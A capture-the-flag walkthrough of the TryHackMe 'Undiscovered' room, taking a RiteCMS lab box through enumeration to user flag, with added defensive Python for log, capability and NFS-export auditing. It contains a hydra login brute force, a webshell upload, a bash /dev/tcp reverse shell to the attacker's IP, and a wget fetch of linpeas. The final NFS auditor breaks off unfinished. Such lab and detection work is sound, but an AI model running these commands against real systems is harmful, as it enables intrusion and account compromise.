TryHackMe: Undiscovered https://tryhackme.com/room/undiscoveredup
Enumeration
Break out rustscan after connecting to the TryHackMe VPN.
$ rustscan -a undiscovered -- -sC -sV -oA undiscovered -A -v
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍
[~] The config file is expected to be at "/home/tj/.rustscan.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.46.19:22
Open 10.10.46.19:80
Open 10.10.46.19:111
Open 10.10.46.19:2049
Open 10.10.46.19:43839
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-30 13:18 GMT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:18
Completed NSE at 13:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:18
Completed NSE at 13:18, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:18
Completed NSE at 13:18, 0.00s elapsed
Initiating Ping Scan at 13:18
Scanning 10.10.46.19 [2 ports]
Completed Ping Scan at 13:18, 0.03s elapsed (1 total hosts)
Initiating Connect Scan at 13:18
Scanning undiscovered.thm (10.10.46.19) [5 ports]
Discovered open port 111/tcp on 10.10.46.19
Discovered open port 80/tcp on 10.10.46.19
Discovered open port 22/tcp on 10.10.46.19
Discovered open port 2049/tcp on 10.10.46.19
Discovered open port 43839/tcp on 10.10.46.19
Completed Connect Scan at 13:18, 0.03s elapsed (5 total ports)
Initiating Service scan at 13:18
Scanning 5 services on undiscovered.thm (10.10.46.19)
Completed Service scan at 13:19, 6.32s elapsed (5 services on 1 host)
NSE: Script scanning 10.10.46.19.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 1.25s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.20s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.00s elapsed
Nmap scan report for undiscovered.thm (10.10.46.19)
Host is up, received syn-ack (0.032s latency).
Scanned at 2020-11-30 13:18:54 GMT for 8s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:76:81:49:50:bb:6f:4f:06:15:cc:08:88:01:b8:f0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0m4DmvKkWm3OoELtyKxq4G9yM29DEggmEsfKv2fzZh1G6EiPS/pKPQV/u8InqwPyyJZv82Apy4pVBYL7KJTTZkxBLbrJplJ6YnZD5xZMd8tf4uLw5ZCilO6oLDKH0pchPmQ2x2o5x2Xwbzfk4KRbwC+OZ4f1uCageOptlsR1ruM7boiHsPnDO3kCujsTU/4L19jJZMGmJZTpvRfcDIhelzFNxCMwMUwmlbvhiCf8nMwDaBER2HHP7DKXF95uSRJWKK9eiJNrk0h/K+3HkP2VXPtcnLwmbPhzVHDn68Dt8AyrO2d485j9mLusm4ufbrUXSyfM9JxYuL+LDrqgtUxxP
| 256 2b:39:d9:d9:b9:72:27:a9:32:25:dd:de:e4:01:ed:8b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAcr7A7L54JP/osGx6nvDs5y3weM4uwfT2iCJbU5HPdwGHERLCAazmr/ss6tELaj7eNqoB8LaM2AVAVVGQXBhc8=
| 256 2a:38:ce:ea:61:82:eb:de:c4:e0:2b:55:7f:cc:13:bc (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAII9WA55JtThufX7BcByUR5/JGKGYsIlgPxEiS0xqLlIA
80/tcp open http syn-ack Apache httpd 2.4.18
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100021 1,3,4 37168/tcp6 nlockmgr
| 100021 1,3,4 39694/udp6 nlockmgr
| 100021 1,3,4 43839/tcp nlockmgr
| 100021 1,3,4 50295/udp nlockmgr
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
2049/tcp open nfs syn-ack 2-4 (RPC #100003)
43839/tcp open nlockmgr syn-ack 1-4 (RPC #100021)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.38 seconds
22 - ssh
We do not have a username/password, so let's skip this for now.
80 - HTTP
Nothing interesting in the source code.
111 - rpc
Here we have a list of services running on the server:
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100021 1,3,4 37168/tcp6 nlockmgr
| 100021 1,3,4 39694/udp6 nlockmgr
| 100021 1,3,4 43839/tcp nlockmgr
| 100021 1,3,4 50295/udp nlockmgr
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
2049 - NFS
Network file share, but unfortunately showmount is not working ....
$ showmount --exports undiscovered.thm
clnt_create: RPC: Program not registered
$ showmount -e 10.10.46.19
clnt_create: RPC: Program not registered
43839 - nlockmgr
This is the lock manager for NFS; nothing really interesting here.
Exploring HTTP ( port 80 )
Nothing much obvious, so let's take a look at the background image in case there is any stego.
$ file bg.jpg
bg.jpg: JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, comment: "Lavc58.11.101", baseline, precision 8, 1920x1080, components 3
$ exiftool bg.jpg
ExifTool Version Number : 12.10
File Name : bg.jpg
Directory : .
File Size : 42 kB
File Modification Date/Time : 2019:01:15 08:51:52+00:00
File Access Date/Time : 2020:11:30 13:30:53+00:00
File Inode Change Date/Time : 2020:11:22 23:26:28+00:00
File Permissions : rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.02
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Comment : Lavc58.11.101
Image Width : 1920
Image Height : 1080
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 1920x1080
Megapixels : 2.1
$ binwalk bg.jpg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.02
$ steghide extract -sf bg.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!
Nothing interesting there, so let's run gobuster against it.
$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://undiscovered.thm -x php,txt,html,htm,asp,bak,zip
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://undiscovered.thm
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,html,htm,asp,bak,zip,php
[+] Timeout: 10s
===============================================================
2020/11/30 13:35:08 Starting gobuster
===============================================================
With the above I am also looking for some file extensions that may return something, but apart from the below nothing was flagged up.
/index.php (Status: 200)
/images (Status: 301)
Hmmm, ok, so lately there have been some fuzzing and subdomain rooms, so let's have a try with gobuster looking for vhosts.
$ gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://undiscovered.thm -r 200
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://undiscovered.thm
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/11/30 13:59:02 Starting gobuster
===============================================================
Found: manager.undiscovered.thm (Status: 200) [Size: 4584]
Found: dashboard.undiscovered.thm (Status: 200) [Size: 4626]
Found: deliver.undiscovered.thm (Status: 200) [Size: 4650]
Found: newsite.undiscovered.thm (Status: 200) [Size: 4584]
Found: develop.undiscovered.thm (Status: 200) [Size: 4584]
Found: network.undiscovered.thm (Status: 200) [Size: 4584]
Found: forms.undiscovered.thm (Status: 200) [Size: 4542]
Found: maintenance.undiscovered.thm (Status: 200) [Size: 4668]
Found: view.undiscovered.thm (Status: 200) [Size: 4521]
Found: mailgate.undiscovered.thm (Status: 200) [Size: 4605]
Found: play.undiscovered.thm (Status: 200) [Size: 4521]
Found: start.undiscovered.thm (Status: 200) [Size: 4542]
Found: booking.undiscovered.thm (Status: 200) [Size: 4599]
Found: terminal.undiscovered.thm (Status: 200) [Size: 4605]
Found: gold.undiscovered.thm (Status: 200) [Size: 4521]
Found: internet.undiscovered.thm (Status: 200) [Size: 4605]
OK, we have subdomains here, so let's add dashboard and manager to our hosts file.
Both appear to go to the same page, so we have a RiteCMS site. Let's take a look around....
Bugger, getting 404s browsing around, so let's break out gobuster again ....
$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://manager.undiscovered.thm -x php,sql,db,bak,asp,htm,html,txt,zip
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://manager.undiscovered.thm
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: asp,htm,txt,zip,php,sql,db,bak,html
[+] Timeout: 10s
===============================================================
2020/11/30 14:07:16 Starting gobuster
===============================================================
/index.php (Status: 200)
Whilst that was running (it wasn't bringing anything back :( ) I jumped into view-source and found a reference to http://deliver.undiscovered.thm/rss. So let's add this to our /etc/hosts and give that a scan....
$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://deliver.undiscovered.thm -x php,sql,db,bak,asp,htm,html,txt,zip
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://deliver.undiscovered.thm
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: db,asp,htm,txt,zip,php,sql,bak,html
[+] Timeout: 10s
===============================================================
2020/11/30 14:10:18 Starting gobuster
===============================================================
/index.php (Status: 200)
/templates (Status: 301)
/media (Status: 301)
/files (Status: 301)
/data (Status: 301)
/cms (Status: 301)
/README.txt (Status: 200)
/js (Status: 301)
/INSTALL.txt (Status: 200)
/LICENSE (Status: 200)
.......
SYSTEM REQUIREMENTS
* Apache webserver with mod_rewrite and .htaccess file support enabled
* PHP 5 with PDO and SQLite driver enabled
INSTALLATION
1. Load up the script files to your server
2. Depending on your server configuration you may need to change the write
permissions of the following subdirectories:
* cms/cache (CHMOD 777) - cache directory, needs to be writable if
you want to use the caching feature
* media and images (CHMOD 777) - need to be writable if you want to
use the file uploader
3. Ready! You should now be able to access the index page by browsing to the
address you uploaded RiteCMS (e.g.http://your-domain.tld/path/to/phpsqlitecms/).
To administrate the page, go to http://your-domain.tld/path/to/ritecms/cms/.
The default admin userdata is: username: admin, password: admin.
SECURITY
1. Please change your password asap.
2. To avoid XSS attack, please change the token in CMS/index.php Line 27 (or else if you change the file)
define('TOKEN_SALT', 'monkey');
Change 'monkey' to anything else.
Finally!!!! Something interesting, let's take a look at /cms.
/CMS
From the above INSTALL.txt we see that the default username/password is admin/admin.
Worth a try, but as we know the username let's break out hydra.
URL: http://deliver.undiscovered.thm/cms/index.php
Body: username=admin&userpw=admin
Failure: User unknown or password wrong
So our command will be:
$ hydra -ladmin -P /usr/share/wordlists/rockyou.txt deliver.undiscovered.thm http-form-post "/cms/index.php:username=^USER^&userpw=^PASS^:User unknown or password wrong" -I -f
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-30 14:50:42
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://deliver.undiscovered.thm:80/cms/index.php:username=^USER^&userpw=^PASS^:User unknown or password wrong
[80][http-post-form] host: deliver.undiscovered.thm login: admin password: [REDACTED]
[STATUS] attack finished for deliver.undiscovered.thm (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-30 14:50:45
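From the defender's side, a run like the one above leaves a very recognisable trace in the web server's access log: a burst of POSTs to /cms/index.php from one source. As an added example (not part of this walkthrough), the following parses Apache combined-format log lines and flags any source that POSTs to the login path at least ten times inside a 60-second sliding window; the log lines are constructed and the window and threshold are assumptions.

```python
"""Detect password brute-forcing against the RiteCMS login form in Apache logs.

Added example, not part of the walkthrough. The access-log lines are
constructed to resemble what the hydra run against /cms/index.php leaves
behind in a combined-format log; the window and threshold are assumptions.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache combined log: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"

LOGIN_PATH = "/cms/index.php"   # the form hydra was pointed at
WINDOW_SECONDS = 60             # assumption: sliding window length
THRESHOLD = 10                  # assumption: POSTs per window that trigger an alert


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], TIME_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect_bruteforce(lines, login_path=LOGIN_PATH, window=WINDOW_SECONDS,
                      threshold=THRESHOLD):
    """Return {ip: time_of_first_alert} for sources that POST to the login
    path at least `threshold` times inside any `window`-second sliding window.
    Only POSTs count: a GET of the login page is a normal page load."""
    recent = defaultdict(deque)   # ip -> timestamps of recent login POSTs
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if rec["path"].split("?", 1)[0] != login_path:
            continue
        q = recent[rec["ip"]]
        q.append(rec["time"])
        while (rec["time"] - q[0]).total_seconds() > window:
            q.popleft()             # drop POSTs that fell out of the window
        if len(q) >= threshold and rec["ip"] not in alerts:
            alerts[rec["ip"]] = rec["time"]
    return alerts


def sample_log():
    """Constructed sample: 12 POSTs from one host within two seconds (what a
    hydra run looks like), plus benign traffic from another host."""
    lines = [
        f'10.9.5.198 - - [30/Nov/2020:14:50:{42 + i // 6} +0000] '
        f'"POST /cms/index.php HTTP/1.0" 200 4521 "-" "Mozilla/5.0 (Hydra)"'
        for i in range(12)
    ]
    lines.append('10.10.10.5 - - [30/Nov/2020:14:50:43 +0000] '
                 '"GET /cms/index.php HTTP/1.1" 200 4521 "-" "Mozilla/5.0"')
    lines.append('10.10.10.5 - - [30/Nov/2020:14:51:02 +0000] '
                 '"POST /cms/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"')
    return lines


if __name__ == "__main__":
    for ip, when in detect_bruteforce(sample_log()).items():
        print(f"ALERT login brute-force from {ip} starting {when:%H:%M:%S}")
```

The same logic applied to a real log would alert on the tenth POST of the hydra run, roughly three seconds into it, which is well before rockyou.txt gets anywhere near the end.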
/data
Whilst waiting for hydra to brute force the admin password I looked around some of the other directories, and under /data found a browsable directory listing.
So let's download these and take a look....
$ wget -m --no-parent http://deliver.undiscovered.thm/data/
This should mirror the contents of the directory, although it may be a bit messy...
$ ls -R
.:
content 'index.html?C=D;O=A' 'index.html?C=M;O=D' 'index.html?C=S;O=A' userdata
entries 'index.html?C=D;O=D' 'index.html?C=N;O=A' 'index.html?C=S;O=D'
index.html 'index.html?C=M;O=A' 'index.html?C=N;O=D' sql
./sql:
index.html 'index.html?C=M;O=A' 'index.html?C=N;O=D' mysql.initial.sql
'index.html?C=D;O=A' 'index.html?C=M;O=D' 'index.html?C=S;O=A' sqlite.content.initial.sql
'index.html?C=D;O=D' 'index.html?C=N;O=A' 'index.html?C=S;O=D' sqlite.user.initial.sql
Let's use the file command as we are missing some extensions..
$ file *
content: SQLite 3.x database, last written using SQLite version 3011000
entries: SQLite 3.x database, last written using SQLite version 3007015
index.html: HTML document, ASCII text
index.html?C=D;O=A: HTML document, ASCII text
index.html?C=D;O=D: HTML document, ASCII text
index.html?C=M;O=A: HTML document, ASCII text
index.html?C=M;O=D: HTML document, ASCII text
index.html?C=N;O=A: HTML document, ASCII text
index.html?C=N;O=D: HTML document, ASCII text
index.html?C=S;O=A: HTML document, ASCII text
index.html?C=S;O=D: HTML document, ASCII text
sql: directory
userdata: SQLite 3.x database, last written using SQLite version 3011000
$ file */*
sql/index.html: HTML document, ASCII text
sql/index.html?C=D;O=A: HTML document, ASCII text
sql/index.html?C=D;O=D: HTML document, ASCII text
sql/index.html?C=M;O=A: HTML document, ASCII text
sql/index.html?C=M;O=D: HTML document, ASCII text
sql/index.html?C=N;O=A: HTML document, ASCII text
sql/index.html?C=N;O=D: HTML document, ASCII text
sql/index.html?C=S;O=A: HTML document, ASCII text
sql/index.html?C=S;O=D: HTML document, ASCII text
sql/mysql.initial.sql: ASCII text, with very long lines
sql/sqlite.content.initial.sql: UTF-8 Unicode text, with very long lines
sql/sqlite.user.initial.sql: ASCII text
Looks like we have some SQLite files, so we can break out sqlitebrowser to take a look at these. The first one I am looking at is userdata.
Here we have a password hash for the admin user, let's see if we can crack it...
Crackstation does not have it and cannot identify it, so let's try https://md5hashing.net/hash_type_checker which identifies it as base64 or HEX, neither of which appear to be correct...
Ok, well, Hydra cracked the password so we are in.
User flag
As we are now logged into RiteCMS we can look around to see what we can do. Under Administration » File Manager we can upload some files, so first I upload a webshell.
Here we execute /bin/bash -c 'bash -i >& /dev/tcp/10.9.5.198/4444 0>&1' and in our terminal we execute $ nc -lvnp 4444 to get a reverse shell. Let's do our usual to get a nice tty shell...
listening on [any] 4444 ...
connect to [10.9.5.198] from (UNKNOWN) [10.10.46.19] 45750
bash: cannot set terminal process group (1245): Inappropriate ioctl for device
bash: no job control in this shell
www-data@undiscovered:/var/www/deliver.undiscovered.thm/files$ python -c 'import pty;pty.spawn("/bin/bash")'
<hm/files$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@undiscovered:/var/www/deliver.undiscovered.thm/files$ export TERM=xterm
<www/deliver.undiscovered.thm/files$ export TERM=xterm
www-data@undiscovered:/var/www/deliver.undiscovered.thm/files$ ^Z
[1]+ Stopped nc -lvnp 4444
$ stty raw -echo; fg
nc -lvnp 4444
www-data@undiscovered:/var/www/deliver.undiscovered.thm/files$
Ok, let's take a look at /home and see if we can see the flag.
$ ls -R /home
/home:
leonard william
ls: cannot open directory '/home/leonard': Permission denied
ls: cannot open directory '/home/william': Permission denied
Hmmm, not what we wanted, let's see if we can sudo.
www-data@undiscovered:/var/www/deliver.undiscovered.thm/files$ sudo -l
[sudo] password for www-data:
Sorry, try again.
Not much help there, what group are we in?
www-data@undiscovered:/var/www/deliver.undiscovered.thm/files$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Ok, looks like we need to privesc to get any further. A quick ls under /var/www doesn't reveal anything interesting..
www-data@undiscovered:/var/www$ ls *
booking.undiscovered.thm:
index.php style.css
dashboard.undiscovered.thm:
index.php style.css
deliver.undiscovered.thm:
CHANGELOG_RiteCMS.txt LICENSE cms files js style.css
INSTALL.txt README.txt data index.php media templates
develop.undiscovered.thm:
index.php style.css
forms.undiscovered.thm:
index.php style.css
gold.undiscovered.thm:
index.php style.css
html:
index.php
internet.undiscovered.thm:
index.php style.css
mailgate.undiscovered.thm:
index.php style.css
maintenance.undiscovered.thm:
index.php style.css
manager.undiscovered.thm:
index.php style.css
network.undiscovered.thm:
index.php style.css
newsite.undiscovered.thm:
index.php style.css
play.undiscovered.thm:
index.php style.css
resources.undiscovered.thm:
index.php style.css
start.undiscovered.thm:
index.php style.css
terminal.undiscovered.thm:
index.php style.css
undiscovered.thm:
images index.php
view.undiscovered.thm:
index.php style.css
Let's get linpeas.sh onto the box and give it a run...
www-data@undiscovered:/var/www$ cd /tmp
www-data@undiscovered:/tmp$ wget http://10.9.5.198:8000/linpeas.sh
--2020-11-30 23:00:32-- http://10.9.5.198:8000/linpeas.sh
Connecting to 10.9.5.198:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 223835 (219K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 100%[===================>] 218.59K --.-KB/s in 0.1s
2020-11-30 23:00:32 (1.50 MB/s) - 'linpeas.sh' saved [223835/223835]
www-data@undiscovered:/tmp$ sh linpeas.sh | tee linpeas.log
Interesting bits:
OS: Linux version 4.4.0-189-generic (buildd@lgw01-amd64-047) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12) ) #219-Ubuntu SMP Tue Aug 11 12:26:50 UTC 2020
[+] NFS exports?
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
/home/william *(rw,root_squash)
[+] Capabilities
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/vim.basic = cap_setuid+ep
[+] Unexpected folders in root
/lib32
/libx32
VIM
Looking at the output VIM has cap_setuid+ep, so checking GTFOBins..
www-data@undiscovered:/tmp$ vim
bash: /usr/bin/vim: Permission denied
Bugger, cannot run vim or vi.
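A file capability such as cap_setuid on an editor is usable by anyone who can execute the binary, so the permission denied above only delays the problem until a user who can run vim turns up. As an added example (not part of this walkthrough), the following parses `getcap -r / 2>/dev/null` output in both the older libcap format shown by linpeas above and the newer `path cap=flags` format, and flags binaries whose capabilities are effectively root; the sample lines are the four the box reported plus one constructed newer-format line, and the list of root-equivalent capabilities is an assumed audit policy.

```python
"""Flag file capabilities that are equivalent to root in `getcap -r` output.

Added example, not part of the walkthrough. Handles the older libcap format
("/path = cap_a,cap_b+ep", as printed on the box) and the newer one
("/path cap_a,cap_b=ep"). ROOT_EQUIVALENT is an assumed audit policy.
"""
import re

# Capabilities that let a process become root or read/write anything it likes.
ROOT_EQUIVALENT = {
    "cap_setuid": "can setuid(0) and exec a shell",
    "cap_setgid": "can change gid arbitrarily",
    "cap_dac_override": "bypasses file permission checks",
    "cap_dac_read_search": "reads any file on the system",
    "cap_sys_admin": "broad administrative operations",
    "cap_sys_ptrace": "can attach to and inject into other processes",
    "cap_sys_module": "loads kernel modules",
    "cap_chown": "changes ownership of any file",
    "cap_fowner": "bypasses file owner checks",
}

OLD_FMT = re.compile(r'^(?P<path>\S+) = (?P<caps>[^+]+)\+(?P<flags>\w+)$')
NEW_FMT = re.compile(r'^(?P<path>\S+) (?P<caps>[^=]+)=(?P<flags>\w*)$')


def parse_getcap_line(line):
    """Return (path, [capabilities], flags) or None if the line is not getcap output."""
    line = line.strip()
    m = OLD_FMT.match(line) or NEW_FMT.match(line)
    if not m:
        return None
    caps = [c.strip() for c in m.group("caps").split(",") if c.strip()]
    return m.group("path"), caps, m.group("flags")


def audit_capabilities(lines):
    """Return {path: [(capability, why it matters)]} for binaries carrying a
    root-equivalent capability in their permitted or effective set."""
    results = {}
    for line in lines:
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps, flags = parsed
        if "p" not in flags and "e" not in flags:
            continue    # inheritable-only file caps cannot be used by the binary itself
        hits = [(c, ROOT_EQUIVALENT[c]) for c in caps if c in ROOT_EQUIVALENT]
        if hits:
            results[path] = hits
    return results


# The four lines linpeas reported above, plus one constructed newer-format line.
SAMPLE_GETCAP = [
    "/usr/bin/mtr = cap_net_raw+ep",
    "/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep",
    "/usr/bin/traceroute6.iputils = cap_net_raw+ep",
    "/usr/bin/vim.basic = cap_setuid+ep",
    "/usr/bin/ping cap_net_raw=ep",
]

if __name__ == "__main__":
    for path, hits in audit_capabilities(SAMPLE_GETCAP).items():
        for cap, why in hits:
            print(f"{path}: {cap} ({why})")
```

On this box the finding for /usr/bin/vim.basic is the one that matters; the fix is to remove the capability (`setcap -r /usr/bin/vim.basic`) and grant any legitimate need through a specific sudo rule instead.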
NFS
Ok, so we have the directory exported, so let's try mounting NFS.
$ mkdir nfs
$ sudo mount -tnfs undiscovered:/home/william nfs
$ ls nfs
ls: cannot open directory 'nfs': Permission denied
$ sudo !!
sudo ls nfs
ls: cannot open directory 'nfs': Permission denied
No joy there .... looking at the output from /etc/passwd we can see the below users:
william:x:3003:3003::/home/william:/bin/bash
leonard:x:1002:1002::/home/leonard:/bin/bash
Let's try and add william to our system and mount NFS for him.
$ sudo useradd -u 3003 william -s /bin/bash
$ sudo su - william
su: warning: cannot change directory to /home/william: No such file or directory
$ ls nfs
admin.sh script user.txt
$ cat nfs/user.txt
THM{[REDACTED]}
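The reason the useradd trick works is worth spelling out: with NFSv3 and the default AUTH_SYS flavour the server simply trusts the uid/gid the client sends, and root_squash only remaps uid 0, so any host that can mount the share can act as uid 3003. As an added example (not part of this walkthrough), the following parses /etc/exports entries and flags that pattern; the first sample line is the export linpeas reported, the second is an illustrative hardened version with an assumed client host of 10.10.46.50.

```python
"""Audit /etc/exports entries for the pattern exploited above.

Added example, not part of the walkthrough. With NFSv3 and the default
AUTH_SYS security flavour the server trusts whatever uid/gid the client
presents; root_squash only remaps uid 0, so a client that creates a local
user with the directory owner's uid (3003 here) is treated as that user.
"""
import re

EXPORT_RE = re.compile(r'^(?P<path>\S+)\s+(?P<clients>.+)$')
CLIENT_RE = re.compile(r'(?P<host>[^\s(]+)(?:\((?P<opts>[^)]*)\))?')

# Constructed sample: the export linpeas reported on the box, then an
# illustrative hardened version (client pinned to an assumed host, Kerberos auth).
SAMPLE_EXPORTS = """\
# constructed sample /etc/exports
/home/william *(rw,root_squash)
/home/william 10.10.46.50(rw,sec=krb5p,root_squash)
"""


def parse_exports(text):
    """Return [(path, host, [options])] for every client spec in an exports file."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        m = EXPORT_RE.match(line) if line else None
        if not m:
            continue
        for c in CLIENT_RE.finditer(m.group("clients")):
            opts = [o.strip() for o in (c.group("opts") or "").split(",") if o.strip()]
            entries.append((m.group("path"), c.group("host"), opts))
    return entries


def audit_export(path, host, opts):
    """Return a list of findings for one export entry (empty means it passed)."""
    findings = []
    kerberos = any(o in ("sec=krb5", "sec=krb5i", "sec=krb5p") for o in opts)
    if host in ("*", "0.0.0.0/0") or host.startswith("*."):
        findings.append("wildcard client list: any host that can reach port 2049 may mount it")
    if "no_root_squash" in opts:
        findings.append("no_root_squash: root on the client is root on the share")
    if not kerberos and "all_squash" not in opts:
        findings.append("AUTH_SYS without all_squash: the client-chosen uid is trusted and "
                        "root_squash only remaps uid 0, so a client can pick the owner's uid")
    if "rw" in opts and findings:
        findings.append("rw: the problems above allow writing as the impersonated user")
    return findings


def audit_exports(text):
    """Map (path, host) -> findings for every entry in the exports text."""
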